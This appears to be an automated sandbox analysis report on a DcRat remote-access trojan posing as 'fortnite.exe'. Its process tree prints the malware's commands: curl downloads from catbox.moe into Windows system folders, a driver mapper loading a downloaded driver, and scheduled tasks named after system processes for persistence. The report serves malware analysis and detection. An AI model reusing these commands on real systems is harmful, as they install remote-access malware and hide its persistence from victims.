Analysis
-
max time kernel
55s -
max time network
58s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
17-11-2024 19:28
General
-
Target
fortnite.exe
-
Size
1.2MB
-
MD5
4ce2034a29fa1119013b35414ac146c8
-
SHA1
1bc3b7ff47f254f3058f8030e7081d48e762b1fc
-
SHA256
01d4438ab4eb34157102cef468aeafe178500b30a557efb0a14bcf117e7eeb8f
-
SHA512
9ff48316eff7b1cf2317ce9c363b596a42100c0f2ff3c17f06c3efe8f3f4b8de93072f594c4dfc7f7cdbf9b4c768643448141ca78bab4db28122f88d3ad64e27
-
SSDEEP
24576:zMbpm9Z/zQfnkuGKF7rlpC+bKlAtc06Du:PrQnIGz
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Medal\Medal.exe"C:\Medal/Medal.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pjGtyYN45Q.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650017⤵
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
-
-
C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe"C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys3⤵
- Drops file in System32 directory
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe3⤵
- Drops file in System32 directory
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Tasks\mapper.exeC:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jdk-1.8\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jdk-1.8\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 8 /tr "'C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnitef" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnite" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnitef" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\fortnite.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Medal\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Medal\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Medal\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\Microsoft.NET\Framework64\3082\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\Framework64\3082\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Windows\Microsoft.NET\Framework64\3082\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 11 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63B
MD5e24619181276af563705f4b1bed29490
SHA1fddac27290319f69543f5330fe97c122a8a01376
SHA256eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05
SHA5121898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591
-
Filesize
224B
MD596d43070e1e39d421c53a2f8dca13fc6
SHA107417cccceddbf8d5f5b48dec0b2e08d53a4754f
SHA2560dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314
SHA5129fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398
-
Filesize
1.8MB
MD54f66bbfed3a524398bd0267ed974ccbc
SHA1b2567397dc823412d87a23428c7833ff74586b7d
SHA256fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8
SHA512bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f
-
Filesize
241B
MD5455f6185faee0c13507a0fbeeaef3a65
SHA1ba16cd19a44fbc19b4f7ac69ed330c774857c907
SHA256a1e6c1ef5204d5b2c576c9f85f848aa44862735e670c0719ecc3e6084943121a
SHA5126be0ac00324aea63e26bb722642937d5e493ee7a9b14f53a57fba2a933d73c8941b68b11f9aa3673fe6350efd6967a5e0caa0dd6615a37586851e965b49309a5
-
Filesize
2.1MB
MD5f4620c0afa8e21897509b2e7215097f5
SHA1af216ca6105e271a3fb45a23c10ee7cf3158b7e1
SHA2568daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82
SHA51268b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd
-
Filesize
12KB
MD510a7579c03da9baac0f2efc69673d8c2
SHA1acd27171757c05216665a332450f0604b33b07d5
SHA256797c199601f2dcee255c24da2507ba435f03dcee0fdadbe348023aa75ebb2ad3
SHA512a9cb4c7765e34bb3d8dc1356e37dfeca72e713731c036a3eb48bf69daac6c1f45910409e24ec01e1b13cd9d5d0cad708f1483cd83dcec00566cb307652fe7233
-
Filesize
530KB
MD554ed683eba9340abf6783bd8d7b39445
SHA1950e3c11c71354097c8440529b31f8ac2b3c32a8
SHA2562d0a9d5ca563ffa82a974903bb43411b22c863311ec926449f08d16f483e4e70
SHA5129ff8c110823bad1e0a79a810b151e1d5557022080af0c8aaa9ff76996bd040747346f62459c50468cf86f49389c0e5fb7f057e9bd30fa31fed49ae5692d50ae2
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
708KB
-
Filesize
708KB
-
Filesize
320KB
-
Filesize
96KB
-
Filesize
56KB
-
Filesize
112KB
-
Filesize
56KB
-
Filesize
1.9MB